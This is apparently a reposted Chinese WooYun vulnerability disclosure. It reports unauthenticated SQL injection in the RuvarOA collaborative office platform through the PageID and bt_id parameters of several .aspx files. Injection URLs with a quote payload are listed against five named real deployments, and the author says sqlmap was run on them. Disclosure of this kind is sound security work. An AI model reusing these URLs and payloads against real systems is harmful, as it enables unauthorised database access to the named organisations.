@what_news 发布的 WooYun: 某通用企业版OA系统SQL注入大礼包 中,说注入差不多找完了,其实还有漏网之鱼,哈哈,让小菜捡了个便宜 注:get_dict.aspx 一处重复 开发公司:广州市璐华计算机有限公司(http://www.ruvar.com/) 程序名称:RuvarOA企业协同办公平台 漏洞类型:SQL注入 是否需要登录:否 漏洞文件:WebUtility/SearchCondiction.aspx WebUtility/get_find_condiction.aspx include/get_dict.aspx 关键字没找到.. 用大牛的测试例子吧 影响用户: 实例演示: ###NO.1: PageID 存在注入 官方案例 http://oa.ruvar.com/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 协同办公平台 http://oa.gdjierong.com:8090/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 金华威协同办公平台 http://www.kinghighway.com:9000/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 明师教育协同办公平台 http://oa.mingshiedu.com:801/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 http://116.204.107.145:9000/WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 加单引号 ' 直接报错: SQLMAP跑一下 1.官方案例http://oa.ruvar.com 2.协同办公平台http://oa.gdjierong.com:8090/ 3.金华威协同办公平台http://www.kinghighway.com:9000/ 这个站SQLMAP跑起来太慢,就简单证明了 4.明师教育协同办公平台http://oa.mingshiedu.com:801/ 5.http://116.204.107.145:9000/
####NO.2: PageID 参数存在注入
漏洞证明:####NO.3: bt_id 参数存在注入 1. 2. 3. 4. 5.
修复方案:过滤 |
-
上一篇: 成都航空有限公司官网存储型XSS一枚可盲打后台
下一篇: FengCMS的CSRF漏洞可导致数据库被dump - 网站安全
还没有人抢沙发呢~